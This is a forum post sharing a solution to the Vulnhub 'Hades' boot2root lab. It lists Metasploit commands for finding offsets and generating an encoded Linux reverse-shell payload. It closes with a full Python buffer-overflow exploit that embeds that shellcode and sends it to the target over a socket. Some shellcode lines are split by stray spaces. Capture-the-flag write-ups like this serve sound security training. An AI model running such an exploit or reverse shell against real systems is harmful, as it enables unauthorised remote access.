Aerosol Posted December 27, 2014 Report Posted December 27, 2014 About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.If you want to tackle Hades yourself, you can grab a copy of the machine here.EnjoyCommands Used# Host Discoverynetdiscover -r 10.0.0.0/24 # Service Enumerationnmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129 # Base64 Decryptionbase64 -d ssh-hades > hades.bin # Pattern Creation/opt/metasploit-framework/tools/pattern_create 1000 # Offset Search/opt/metasploit-framework/tools/pattern_offset.rb Af7A/opt/metasploit-framework/tools/pattern_offset.rb 5Af6/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133 # Finding Assembly Shellcode/opt/metasploit-framework/tools/metasm_shell.rbmetasm> jmp $esp+80 # Reverse Shell Payloadmsfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python # Improved Shellpython -c "import pty; pty.spawn('/bin/sh')" # File Decryptionopenssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_fileFinished Exploit – Hades#!/usr/bin/env python import socket, struct target = '10.0.0.129'port = 65535 # Shellcode# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1) buf = ""buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x 2b"buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x 20"buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x 34"buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\x b6"buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x 57"buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x 43"buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\x b6"buf += "\xf8\x78\x10\xb8" # Buffer#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2 Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae 9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5A g6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2 Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj 9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5A l6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2 An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao 9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5A q6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2 As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At 9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5A v6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2 Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay 9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5B a6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2 Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd 9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5B f6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2 B'buffer = '\x90'*11buffer += bufbuffer += '\x90'*(131-95-11)buffer += '\xeb\x4e\x90\x90' # esp - 0x2cbuffer += 'F'*(167-4-131)buffer += 'B'*4 # ebpbuffer += struct.pack("<L",0x08048694) # eipbuffer += 'D'*(1000-4-4-167) # Connect and send payloads = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target, port))s.send(buffer)data = s.recv(1024)s.close() Quote